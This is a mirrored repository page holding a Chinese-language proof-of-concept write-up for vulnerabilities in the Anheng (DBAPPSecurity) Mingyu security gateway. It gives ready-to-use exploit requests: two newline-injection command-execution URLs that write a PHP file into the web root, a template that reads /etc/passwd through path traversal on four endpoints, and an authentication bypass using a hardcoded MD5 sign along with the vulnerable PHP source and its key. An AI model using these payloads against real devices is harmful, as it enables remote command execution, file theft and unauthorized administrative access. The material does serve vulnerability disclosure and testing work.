admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/安恒 明御安全网关 命令执行 任意文件读取漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

100 lines
2.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 安恒 明御安全网关 命令执行 任意文件读取漏洞
## 漏洞描述
安恒信息明御安全网关存在命令执行漏洞,导致攻击者可以直接执行系统命令,从而控制目标系统。
## 漏洞分析
参考阅读:
- https://r0fus0d.blog.ffffffff0x.com/post/oem-case/
## 漏洞复现
### 命令执行 1
漏洞 URL
```
/webui/?g=aaa_portal_auth_local_submit&suffix=
```
poc
```
/webui/?g=aaa_portal_auth_local_submit&suffix=%0aecho%20%27%3C%3Fphp%20echo%20%22test%20-%20Open%20source%20project%20%28github.com%2Ftest%2Ftest%29%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2F111111112.php&bkg_flag=0
```
### 命令执行 2
漏洞 URL
```
/webui/?g=aaa_portal_auth_config_reset&type=
```
poc
```
/webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22test%20-%20Open%20source%20project%20%28github.com%2Ftest%2Ftest%29%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2F111111111.php%0a
```
### 任意文件读取
poc
```
requests:
- method: GET
path:
- "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../etc/passwd"
- "{{BaseURL}}/webui/?g=sys_dia_data_check&file_name=../../../../../../../../etc/passwd"
- "{{BaseURL}}/webui/?g=sys_capture_file_download&name=../../../../../../../../etc/passwd"
- "{{BaseURL}}/webui/?g=sys_corefile_sysinfo_download&name=../../../../../../../../etc/passwd"
```
### 验证码绕过
poc
```
/remote_auth.php?user=admin&pwd=admin&sign=ba84d9dd91eb304aca57f0a8f052623e
```
其中 sign 硬编码在 `/usr/local/webui/remote_auth.php` 中:
```php
if($_GET['user']!=null) $usr = formatget($_GET['user']);
if($_GET['pwd']!=null) $pwd = formatget($_GET['pwd']);
if($_GET['sign']!=null) $sign = formatget($_GET['sign']);
$key= 'saplingos!@#$%^&*';//这个key你们协商后保存一致即可
//ba84d9dd91eb304aca57f0a8f052623e
if(empty($usr)){
die('user_null');
}
else if(empty($pwd)){
die('pwd_null');
}
else if (!$sign){
die('sign_null');
}
else if ($sign != md5($key)){
die('sign_error');
}
else{
if (isset($usr, $pwd)) {
LoginHandler::login($usr, $pwd, $num,'',$remote_auth = true);
}
$fail_msg = '';
if (LoginHandler::isLoginFail()) {
$fail_msg = $_SESSION[ERROR_STR];
if (strlen($fail_msg) <= 0) {
$fail_msg = LocalUtil::getCommonResource('login_failed');
}
die($fail_msg);
}
}
```
可以通过任意文件读取漏洞读取 key然后进行爆破。
Reference in New Issue View Git Blame Copy Permalink